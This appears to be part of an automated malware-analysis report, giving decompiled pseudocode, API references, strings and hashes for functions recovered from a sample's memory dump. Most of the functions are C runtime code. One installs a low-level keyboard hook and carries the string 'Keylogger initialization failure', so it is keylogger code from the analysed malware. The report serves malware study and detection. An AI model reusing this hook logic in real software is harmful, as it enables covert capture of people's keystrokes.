				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t42;

				E00430058( &_v12, 0);
				_t39 =  *0x46db88;
				_v8 = _t39;
				_t41 = E0040BA23(_a4, E0040B94C(0x46dd40));
				if(_t41 != 0) {
					L5:
					E004300B0( &_v12);
					return _t41;
				} else {
					if(_t39 == 0) {
						__eflags = E0040EBBB(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t9 =  &_v28; // 0x40e459
							_t34 = _t9;
							E0040B812(_t34);
							_t10 =  &_v28; // 0x40e459
							E0043205A(_t10, 0x46864c);
							asm("int3");
							_push(_t41);
							_t42 = _t34;
							E0040B6F3(_t34, _v36);
							 *_t42 = 0x454290;
							return _t42;
						} else {
							_t41 = _v8;
							 *0x46db88 = _t41;
							 *((intOrPtr*)( *_t41 + 4))();
							E00430269(__eflags, _t41);
							goto L5;
						}
					} else {
						_t41 = _t39;
						goto L5;
					}
				}
			}

0x0040eb01
0x0040eb06
0x0040eb11
0x0040eb22
0x0040eb26
0x0040eb5a
0x0040eb5d
0x0040eb69
0x0040eb28
0x0040eb2a
0x0040eb3e
0x0040eb41
0x0040eb6a
0x0040eb6a
0x0040eb6d
0x0040eb77
0x0040eb7b
0x0040eb80
0x0040eb84
0x0040eb88
0x0040eb8a
0x0040eb8f
0x0040eb99
0x0040eb43
0x0040eb43
0x0040eb48
0x0040eb50
0x0040eb54
0x00000000
0x0040eb59
0x0040eb2c
0x0040eb2c
0x00000000
0x0040eb2c
0x0040eb2a

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040EB01
int.LIBCPMT ref: 0040EB14

Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977

std::locale::_Getfacet.LIBCPMT ref: 0040EB1D
std::_Facet_Register.LIBCPMT ref: 0040EB54
std::_Lockit::~_Lockit.LIBCPMT ref: 0040EB5D
__CxxThrowException@8.LIBVCRUNTIME ref: 0040EB7B
std::exception::exception.LIBCMT ref: 0040EB8A

Strings

Y@, xrefs: 0040EB6A, 0040EB77, 0040EB7A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
String ID: Y@
API String ID: 2287991272-2491949953
Opcode ID: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
Instruction ID: ff1561f7ec47bfe26f0684d44a3055bc139d2b5ebdf4a0be2619b31cd2ef7e2e
Opcode Fuzzy Hash: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
Instruction Fuzzy Hash: 6411E232A00218ABCB14FBAAE80199EB778DF40764F10057BF90577291EB78AE0187DD

Uniqueness

Uniqueness Score: -1.00%

Function 00408892, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408892(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46baf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E0040887B, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E00417226(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E004075C2(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
						E00402084(_t22, _t39 - 0x14, "[ERROR]");
						L00416C80(_t22, 0);
						E00401FC7();
						_t8 = 1;
					}
				}
				return _t8;
			}

0x00408898
0x0040889c
0x004088a1
0x004088a9
0x00000000
0x004088ab
0x004088bb
0x004088c1
0x004088c3
0x004088c5
0x0040890d
0x0040890d
0x00408915
0x0040891b
0x0040891d
0x00000000
0x00000000
0x00408924
0x0040892f
0x00408935
0x00408937
0x00000000
0x00000000
0x00000000
0x00408937
0x00408939
0x00408939
0x004088c7
0x004088d3
0x004088d8
0x004088e3
0x004088f2
0x004088f7
0x00408903
0x0040890a
0x0040890a
0x004088c5
0x00408940

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
SetWindowsHookExA.USER32 ref: 004088BB
GetLastError.KERNEL32 ref: 004088C7

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

GetMessageA.USER32 ref: 00408915
TranslateMessage.USER32(?), ref: 00408924
DispatchMessageA.USER32 ref: 0040892F

Strings

Keylogger initialization failure: error , xrefs: 004088DB
[ERROR], xrefs: 004088ED

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $[ERROR]
API String ID: 3219506041-2451335947
Opcode ID: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
Instruction ID: 34009541f3e87155e43b52d28ab51065b23688c1b97c42bbbbbfc9b875d1dcea
Opcode Fuzzy Hash: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
Instruction Fuzzy Hash: 5E11BF726002016BC3107FB69D0986B77ECEB91756B10063EF886E2191EF74C504C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00446532, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00446532(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0043A4F1();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E0043A504())) = 9;
						L59:
						_t145 = E0043695D();
						goto L60;
					}
					__eflags = _t213 -  *0x46ba00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0043F98C(_t224, _t158);
								E004401F5(0);
								E004401F5(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00445A9E(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044E817(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0043A4CE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E0043A504())) = 9;
											 *(E0043A4F1()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E0044608E();
												} else {
													_t176 = E0044639E();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E0044624E(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E0043A504())) = 0xc;
									 *(E0043A4F1()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E004401F5(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0043A4F1()) =  *_t206 & _t246;
							 *((intOrPtr*)(E0043A504())) = 0x16;
							E0043695D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0043A4F1()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E0043A504())) = 0x16;
					goto L59;
				} else {
					 *(E0043A4F1()) =  *_t212 & 0x00000000;
					_t145 = E0043A504();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x0044653b
0x00446542
0x0044655c
0x0044655e
0x004468c6
0x004468c6
0x004468cb
0x004468cb
0x004468d3
0x004468d9
0x004468d9
0x00000000
0x004468d9
0x00446564
0x0044656a
0x00000000
0x00000000
0x00446572
0x0044657e
0x00446581
0x00446584
0x00446587
0x0044658e
0x00446591
0x00446595
0x00446598
0x0044659b
0x00000000
0x00000000
0x004465a1
0x004465a4
0x004465aa
0x004465c4
0x004465c6
0x004468c2
0x00000000
0x004468c2
0x004465cc
0x004465d0
0x00000000
0x00000000
0x004465d6
0x004465da
0x00000000
0x00000000
0x004465e1
0x004465e5
0x004465e8
0x004465eb
0x004465f0
0x004465f0
0x004465f3
0x00446610
0x00446615
0x00446617
0x00446619
0x00446639
0x0044663a
0x0044663c
0x0044663f
0x00446641
0x00446643
0x00446645
0x00446645
0x00446650
0x00446652
0x00446659
0x0044665e
0x00446661
0x00446664
0x00446666
0x0044668b
0x00446690
0x00446697
0x0044669a
0x0044669d
0x004466a1
0x004466a3
0x004466a7
0x004466a9
0x004466ac
0x004466af
0x004466b1
0x004466b4
0x004466bb
0x004466be
0x004466c3
0x004466c6
0x004466cf
0x004466d3
0x004466d6
0x004466d9
0x004466dc
0x004466e2
0x004466e4
0x004466ed
0x004466f0
0x004466f3
0x004466f6
0x004466f7
0x004466fb
0x00446701
0x0044670b
0x00446710
0x00446720
0x00446724
0x00446727
0x00446729
0x0044672b
0x0044672d
0x0044672f
0x00446737
0x00446738
0x0044673b
0x0044673e
0x0044673f
0x00446745
0x0044674f
0x00446757
0x0044675a
0x00446766
0x0044676a
0x0044676d
0x0044676f
0x00446771
0x00446773
0x00446775
0x0044677d
0x0044677e
0x00446781
0x00446784
0x00446784
0x00446785
0x0044678b
0x00446795
0x00446795
0x00446773
0x0044676f
0x0044675a
0x0044672d
0x00446729
0x00446710
0x004466e4
0x004466dc
0x0044679b
0x004467a1
0x004467a3
0x00446816
0x00446816
0x0044681a
0x0044682a
0x00446830
0x00446832
0x0044688e
0x0044688e
0x00446896
0x00446897
0x00446899
0x004468b2
0x004468b5
0x004467f2
0x004467f3
0x00000000
0x004467f8
0x004468bb
0x00000000
0x004468bb
0x004468a0
0x004468ab
0x00000000
0x004468ab
0x00446834
0x00446837
0x0044683a
0x00000000
0x00000000
0x0044683c
0x0044683c
0x0044683f
0x00446842
0x00446845
0x0044684c
0x00446851
0x00446853
0x00446857
0x00446872
0x00446876
0x00446877
0x0044687a
0x0044687b
0x00446887
0x0044687d
0x0044687d
0x0044687d
0x00446859
0x00446859
0x00446859
0x00446864
0x00446869
0x0044686c
0x0044686c
0x00000000
0x00446851
0x004467a8
0x004467ab
0x004467b2
0x004467b7
0x00000000
0x00000000
0x004467c0
0x004467c6
0x004467c8
0x00000000
0x00000000
0x004467ca
0x004467ce
0x00000000
0x00000000
0x004467e2
0x004467e8
0x004467ea
0x0044680e
0x00446811
0x00000000
0x00446811
0x004467ec
0x00000000
0x00446668
0x0044666d
0x00446678
0x004467f9
0x004467f9
0x004467f9
0x004467fc
0x004467fd
0x00000000
0x00446805
0x00446666
0x0044661b
0x00446620
0x00446627
0x0044662d
0x00000000
0x0044662d
0x004465f5
0x004465f8
0x00446602
0x00446602
0x00446605
0x00446608
0x00000000
0x00446608
0x004465fc
0x004465fe
0x00446600
0x00000000
0x00000000
0x00000000
0x00446600
0x004465ac
0x004465b1
0x004465b9
0x00000000
0x00446544
0x00446549
0x0044654c
0x00446551
0x004468de
0x00000000
0x004468de

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1299b895d60f0c6cb01718edf6d130d6ff8a595175eda8eaae2388f8638f6c
Instruction ID: 967283b79ba0ff2862e9fd1e91011e9ab355d2b8f59743005224cd781b83b7a3
Opcode Fuzzy Hash: 8c1299b895d60f0c6cb01718edf6d130d6ff8a595175eda8eaae2388f8638f6c
Instruction Fuzzy Hash: 6EC11B70D05249AFEF11EFA8C841BAEBBB4BF1A314F05415AE54097392C7789941CF6B

Uniqueness

Uniqueness Score: -1.00%

Function 0044E8D5, Relevance: 13.8, APIs: 9, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044E8D5(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E004401D9(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E004401D9(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0043F98C(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00450810();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E0043F98C(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00450810();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E004420FC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00430BA0(_t130);
													}
												}
											}
										}
									}
								}
								E00430BA0(_t100);
							}
						}
					}
				}
				L63:
				return L0042FD1B(_v8 ^ _t132);
			}

0x0044e8dd
0x0044e8e4
0x0044e8ec
0x0044e8ef
0x0044e8f5
0x0044e8f8
0x0044e8fb
0x0044e8ff
0x0044e902
0x0044e907
0x0044e92e
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e909
0x0044e911
0x0044e913
0x0044e917
0x0044e917
0x0044e91c
0x0044e93a
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e91e
0x0044e927
0x0044e93c
0x0044e93c
0x0044e941
0x0044e948
0x0044e94b
0x0044e94b
0x0044e950
0x0044e95c
0x0044e969
0x0044e976
0x0044e989
0x00000000
0x0044e98b
0x0044e98d
0x0044e9c0
0x00000000
0x0044e9c2
0x0044e9c4
0x0044e9c8
0x0044e9ce
0x0044e9d1
0x0044e9d3
0x0044e9d6
0x0044e9d6
0x0044e9db
0x00000000
0x00000000
0x0044e9dd
0x0044e9e1
0x0044e9eb
0x0044e9f0
0x00000000
0x0044e9f2
0x00000000
0x0044e9f2
0x0044e9f0
0x00000000
0x0044e9e1
0x0044e9d6
0x0044e9d1
0x00000000
0x0044e9c8
0x0044e98f
0x0044e991
0x0044e995
0x0044e99b
0x0044e99e
0x0044e9a0
0x0044e9a0
0x0044e9a5
0x00000000
0x00000000
0x0044e9a7
0x0044e9ab
0x0044e9b5
0x0044e9ba
0x00000000
0x0044e9bc
0x00000000
0x0044e9bc
0x0044e9ba
0x00000000
0x0044e9ab
0x0044e9a0
0x0044e99e
0x00000000
0x0044e995
0x0044e98d
0x0044e978
0x0044e978
0x0044e978
0x00000000
0x0044e978
0x0044e96b
0x0044e96b
0x0044e96d
0x0044e95e
0x0044e95e
0x0044e960
0x0044e960
0x0044e9f7
0x0044e9f7
0x0044e9f7
0x0044ea04
0x0044ea0a
0x0044ea0f
0x0044e930
0x0044ea15
0x0044ea15
0x0044ea1d
0x0044ea21
0x0044ea7c
0x0044ea7e
0x00000000
0x0044ea23
0x0044ea28
0x0044ea2a
0x0044ea2c
0x0044ea34
0x0044ea58
0x0044ea5d
0x0044ea62
0x0044ea68
0x00000000
0x0044ea6e
0x0044ea6e
0x00000000
0x0044ea6e
0x0044ea36
0x0044ea38
0x0044ea3c
0x0044ea41
0x0044ea43
0x0044ea48
0x0044eb5d
0x0044eb5d
0x0044ea4e
0x0044ea4e
0x0044ea74
0x0044ea74
0x0044ea77
0x0044ea81
0x0044ea83
0x00000000
0x0044ea89
0x0044ea91
0x0044ea9f
0x00000000
0x0044eaa5
0x0044eaae
0x0044eab4
0x0044eab9
0x00000000
0x0044eabf
0x0044eabf
0x0044eac2
0x0044eac7
0x0044eacb
0x0044eb17
0x00000000
0x0044eacd
0x0044ead2
0x0044ead4
0x0044ead6
0x0044eade
0x0044eafb
0x0044eb05
0x0044eb07
0x0044eb0a
0x00000000
0x0044eb0c
0x0044eb0c
0x00000000
0x0044eb0c
0x0044eae0
0x0044eae2
0x0044eae6
0x0044eaeb
0x0044eaef
0x0044eb51
0x0044eb51
0x0044eaf1
0x0044eaf1
0x0044eb12
0x0044eb12
0x0044eb19
0x0044eb1b
0x00000000
0x0044eb34
0x0044eb34
0x0044eb4d
0x0044eb4d
0x0044eb1b
0x0044eaef
0x0044eade
0x0044eb55
0x0044eb5a
0x0044eab9
0x0044ea9f
0x0044ea83
0x0044ea48
0x0044ea34
0x0044eb61
0x0044eb67
0x0044ea0f
0x0044e950
0x0044e91c
0x0044eb69
0x0044eb7c

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E981
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA04
__alloca_probe_16.LIBCMT ref: 0044EA3C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044EBAE,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA97
__alloca_probe_16.LIBCMT ref: 0044EAE6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EAAE

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EB2A
__freea.LIBCMT ref: 0044EB55
__freea.LIBCMT ref: 0044EB61

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
